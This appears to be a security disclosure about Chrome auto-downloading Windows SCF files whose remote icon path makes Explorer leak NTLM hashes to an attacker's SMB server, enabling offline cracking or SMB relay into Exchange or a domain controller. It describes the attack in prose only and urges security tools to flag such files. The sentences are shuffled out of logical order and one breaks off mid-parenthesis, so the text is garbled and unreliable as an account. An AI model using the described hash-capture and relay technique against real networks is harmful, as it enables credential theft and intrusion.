With its default configuration, Chrome browser will automatically download files that it deems safe without prompting the user for a download location but instead using the preset one.From a security standpoint, this feature is not an ideal behavior but any malicious content that slips through still requires a user to manually open/run the file to do any damage.Chrome sanitizes LNK files by forcing a extension ever since Stuxnet but does not give the same treatment to SCF files.
All tested solutions failed to flag it as anything suspicious, which we hope will change soon.
SCF file analysis would be easy to implement as it only requires inspection of parameter considering there are no legitimate uses of SCF with remote icon locations.
This enables the attacker to capture a hash which can be cracked many times faster than NTLMv2 – in the case of LM often within seconds using precomputed tables for reversing cryptographic hash functions ("Rainbow tables").
SMB Relay Attacks Organizations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as authentication method, may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without having to crack the password.
There is no need to click or open the downloaded file – Windows File Explorer will automatically try to retrieve the "icon ".
The remote SMB server set up by the attacker is ready to capture the victim's username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g.
This was successfully demonstrated by Jonathan Brossard  at the Black Hat security conference.
Under certain conditions (external exposure) an attacker may even be able to relay credentials to a domain controller on the victim's network and essentially get an internal access to the network.
Naturally, when a browser fails to warn on or sanitize downloads of potentially dangerous file types, one relies on security solutions to do that work instead.